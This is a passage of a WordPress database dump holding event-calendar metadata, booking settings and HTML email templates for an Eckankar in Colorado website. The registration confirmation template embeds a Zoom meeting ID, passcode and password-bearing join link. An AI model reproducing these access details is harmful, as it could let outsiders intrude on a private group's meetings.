;a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(173762,267573,'_thumbnail_id','267574'),(173764,267574,'smush-complete',''),(173765,267576,'protect_children',''),(173766,267576,'mec_color',''),(173767,267576,'mec_location_id','167'),(173768,267576,'mec_dont_show_map','0'),(173769,267576,'mec_organizer_id','1'),(173770,267576,'mec_read_more',''),(173771,267576,'mec_more_info',''),(173772,267576,'mec_more_info_title',''),(173773,267576,'mec_more_info_target','_self'),(173774,267576,'mec_cost',''),(173775,267576,'mec_currency','a:0:{}'),(173776,267576,'mec_additional_organizer_ids','a:0:{}'),(173777,267576,'mec_additional_location_ids','a:0:{}'),(173778,267576,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-19\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-19\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173779,267576,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173780,267576,'mec_certain_weekdays','a:0:{}'),(173781,267576,'mec_allday','0'),(173782,267576,'one_occurrence','0'),(173783,267576,'mec_hide_time','0'),(173784,267576,'mec_hide_end_time','0'),(173785,267576,'mec_comment',''),(173786,267576,'mec_timezone','global'),(173787,267576,'mec_countdown_method','global'),(173788,267576,'mec_public','1'),(173789,267576,'mec_start_date','2023-01-19'),(173790,267576,'mec_start_time_hour','7'),(173791,267576,'mec_start_time_minutes','0'),(173792,267576,'mec_start_time_ampm','PM'),(173793,267576,'mec_start_day_seconds','68400'),(173794,267576,'mec_end_date','2023-01-19'),(173795,267576,'mec_end_time_hour','8'),(173796,267576,'mec_end_time_minutes','0'),(173797,267576,'mec_end_time_ampm','PM'),(173798,267576,'mec_end_day_seconds','72000'),(173799,267576,'mec_repeat_status','0'),(173800,267576,'mec_repeat_type',''),(173801,267576,'mec_repeat_interval','1'),(173802,267576,'mec_repeat_end',''),(173803,267576,'mec_repeat_end_at_occurrences',''),(173804,267576,'mec_repeat_end_at_date',''),(173805,267576,'mec_advanced_days','a:0:{}'),(173806,267576,'mec_in_days',''),(173807,267576,'mec_not_in_days',''),(173808,267576,'mec_hourly_schedules','a:0:{}'),(173809,267576,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173810,267576,'mec_tickets','a:0:{}'),(173811,267576,'mec_fees_global_inheritance','1'),(173812,267576,'mec_fees','a:0:{}'),(173813,267576,'mec_ticket_variations_global_inheritance','1'),(173814,267576,'mec_ticket_variations','a:0:{}'),(173815,267576,'mec_reg_fields_global_inheritance','1'),(173816,267576,'mec_reg_fields','a:0:{}'),(173817,267576,'mec_bfixed_fields','a:0:{}'),(173818,267576,'mec_op','a:0:{}'),(173819,267576,'mec_fields','a:0:{}'),(173820,267576,'mec_event_status','EventScheduled'),(173821,267576,'mec_moved_online_link',''),(173822,267576,'mec_cancelled_reason',''),(173823,267576,'mec_display_cancellation_reason_in_single_page',''),(173824,267576,'boldgrid_hide_page_title','0'),(173825,267576,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(173826,267576,'passster_activate_global_protection',NULL),(173827,267576,'passster_activate_protection',NULL),(173828,267576,'passster_protection_type','password'),(173829,267576,'boldgrid_in_page_containers','1'),(173830,267576,'_dp_original','265240'),(173831,267576,'_edit_lock','1673801233:15'),(173832,267576,'_edit_last','15'),(173833,267576,'_thumbnail_id','266984'),(173834,267577,'mec_color',''),(173835,267577,'mec_location_id','129'),(173836,267577,'mec_dont_show_map','0'),(173837,267577,'mec_organizer_id','1'),(173838,267577,'mec_read_more',''),(173839,267577,'mec_more_info',''),(173840,267577,'mec_more_info_title',''),(173841,267577,'mec_more_info_target','_self'),(173842,267577,'mec_cost',''),(173843,267577,'mec_currency','a:0:{}'),(173844,267577,'mec_additional_organizer_ids','a:0:{}'),(173845,267577,'mec_additional_location_ids','a:0:{}'),(173846,267577,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173847,267577,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173848,267577,'mec_certain_weekdays','a:0:{}'),(173849,267577,'mec_allday','0'),(173850,267577,'one_occurrence','0'),(173851,267577,'mec_hide_time','0'),(173852,267577,'mec_hide_end_time','0'),(173853,267577,'mec_comment',''),(173854,267577,'mec_timezone','global'),(173855,267577,'mec_countdown_method','global'),(173856,267577,'mec_public','1'),(173857,267577,'mec_start_date','2023-01-08'),(173858,267577,'mec_start_time_hour','10'),(173859,267577,'mec_start_time_minutes','30'),(173860,267577,'mec_start_time_ampm','AM'),(173861,267577,'mec_start_day_seconds','37800'),(173862,267577,'mec_end_date','2023-01-08'),(173863,267577,'mec_end_time_hour','11'),(173864,267577,'mec_end_time_minutes','30'),(173865,267577,'mec_end_time_ampm','AM'),(173866,267577,'mec_end_day_seconds','41400'),(173867,267577,'mec_repeat_status','0'),(173868,267577,'mec_repeat_type',''),(173869,267577,'mec_repeat_interval','1'),(173870,267577,'mec_repeat_end',''),(173871,267577,'mec_repeat_end_at_occurrences',''),(173872,267577,'mec_repeat_end_at_date',''),(173873,267577,'mec_advanced_days','a:0:{}'),(173874,267577,'mec_in_days',''),(173875,267577,'mec_not_in_days',''),(173876,267577,'mec_hourly_schedules','a:0:{}'),(173877,267577,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173878,267577,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173879,267577,'mec_fees_global_inheritance','1'),(173880,267577,'mec_fees','a:0:{}'),(173881,267577,'mec_ticket_variations_global_inheritance','1'),(173882,267577,'mec_ticket_variations','a:0:{}'),(173883,267577,'mec_reg_fields_global_inheritance','1'),(173884,267577,'mec_reg_fields','a:0:{}'),(173885,267577,'mec_bfixed_fields','a:0:{}'),(173886,267577,'mec_op','a:0:{}'),(173887,267577,'mec_fields','a:0:{}'),(173888,267577,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(173889,267577,'mec_event_status','EventScheduled'),(173890,267577,'mec_moved_online_link',''),(173891,267577,'mec_cancelled_reason',''),(173892,267577,'mec_display_cancellation_reason_in_single_page',''),(173893,267577,'protect_children',''),(173894,267577,'passster_activate_global_protection',NULL),(173895,267577,'passster_activate_protection',NULL),(173896,267577,'passster_protection_type','password'),(173897,267577,'boldgrid_hide_page_title','0'),(173898,267577,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173899,267577,'boldgrid_in_page_containers','1'),(173903,267577,'_dp_original','266540'),(173901,267577,'_thumbnail_id','267578'),(173902,267577,'_wp_old_date','2022-04-30'),(173904,267577,'_edit_lock','1673801395:15'),(173905,267577,'_edit_last','15'),(173906,267578,'_wp_attached_file','2022/12/Dreams.webp'),(173907,267578,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2022/12/Dreams.webp\";s:8:\"filesize\";i:18150;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Dreams-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5444;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Dreams-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2710;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"Dreams-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6076;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"Dreams-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9462;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"Dreams-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7686;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"Dreams-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(173908,267579,'mec_color',''),(173909,267579,'mec_location_id','118'),(173910,267579,'mec_dont_show_map','0'),(173911,267579,'mec_organizer_id','1'),(173912,267579,'mec_read_more',''),(173913,267579,'mec_more_info',''),(173914,267579,'mec_more_info_title',''),(173915,267579,'mec_more_info_target','_self'),(173916,267579,'mec_cost',''),(173917,267579,'mec_currency','a:0:{}'),(173918,267579,'mec_additional_organizer_ids','a:0:{}'),(173919,267579,'mec_additional_location_ids','a:0:{}'),(173920,267579,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-01\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-01\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173921,267579,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173922,267579,'mec_certain_weekdays','a:0:{}'),(173923,267579,'mec_allday','0'),(173924,267579,'one_occurrence','0'),(173925,267579,'mec_hide_time','0'),(173926,267579,'mec_hide_end_time','0'),(173927,267579,'mec_comment',''),(173928,267579,'mec_timezone','global'),(173929,267579,'mec_countdown_method','global'),(173930,267579,'mec_public','1'),(173931,267579,'mec_start_date','2023-01-01'),(173932,267579,'mec_start_time_hour','10'),(173933,267579,'mec_start_time_minutes','30'),(173934,267579,'mec_start_time_ampm','AM'),(173935,267579,'mec_start_day_seconds','37800'),(173936,267579,'mec_end_date','2023-01-01'),(173937,267579,'mec_end_time_hour','11'),(173938,267579,'mec_end_time_minutes','30'),(173939,267579,'mec_end_time_ampm','AM'),(173940,267579,'mec_end_day_seconds','41400'),(173941,267579,'mec_repeat_status','0'),(173942,267579,'mec_repeat_type',''),(173943,267579,'mec_repeat_interval','1'),(173944,267579,'mec_repeat_end',''),(173945,267579,'mec_repeat_end_at_occurrences',''),(173946,267579,'mec_repeat_end_at_date',''),(173947,267579,'mec_advanced_days','a:0:{}'),(173948,267579,'mec_in_days',''),(173949,267579,'mec_not_in_days',''),(173950,267579,'mec_hourly_schedules','a:0:{}'),(173951,267579,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\